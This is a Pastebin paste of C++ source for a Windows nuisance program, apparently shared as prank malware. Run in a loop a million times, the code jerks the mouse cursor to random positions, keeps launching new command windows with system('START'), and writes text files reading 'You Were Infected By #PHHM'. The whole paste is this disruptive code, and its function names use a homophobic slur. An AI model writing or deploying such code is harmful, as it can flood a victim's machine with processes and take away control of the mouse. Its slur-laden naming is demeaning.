Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <iostream>
- #include <windows.h> // Windows Api
- #include <ctime> // MouseGay
- #include <fstream> // Write File
- using namespace std;
- void mousegay();
- void cmdgay();
- void filegay();
- int main(){
- /*The Gay Start Here*/
- for (int i=0; i < 1000000; i++){
- mousegay();
- cmdgay();
- filegay();
- }
- }
- void mousegay()
- {
- for (int i=100; i < 1000; i++){
- int X,Y;
- X = rand()%i;
- Y = rand()%i;
- SetCursorPos(X,Y);
- }
- }
- void cmdgay()
- {
- for(int i=0; i < 5; i++){
- system("START");
- }
- }
- void filegay()
- {
- ofstream output;
- output.open("infected1.txt");
- output << "You Were Infected By #PHHM" <<endl;
- output << "You Mad ?" << endl;
- output.open("infected2.txt");
- output << "You Were Infected By #PHHM" <<endl;
- output << "You Mad ?" << endl;
- output.open("infected3.txt");
- output << "You Were Infected By #PHHM" <<endl;
- output << "You Mad ?" << endl;
- output.open("infected4.txt");
- output << "You Were Infected By #PHHM" <<endl;
- output << "You Mad ?" << endl;
- output.open("infected5.txt");
- output << "You Were Infected By #PHHM" <<endl;
- output << "You Mad ?" << endl;
- output.open("infected6.txt");
- output << "You Were Infected By #PHHM" <<endl;
- output << "You Mad ?" << endl;
- output.open("infected7.txt");
- output << "You Were Infected By #PHHM" <<endl;
- output << "You Mad ?" << endl;
- output.open("infected8.txt");
- output << "You Were Infected By #PHHM" <<endl;
- output << "You Mad ?" << endl;
- output.open("infected9.txt");
- output << "You Were Infected By #PHHM" <<endl;
- output << "You Mad ?" << endl;
- output.open("infected10.txt");
- output << "You Were Infected By #PHHM" <<endl;
- output << "You Mad ?" << endl;
- }
Advertisement
Add Comment
Please, Sign In to add comment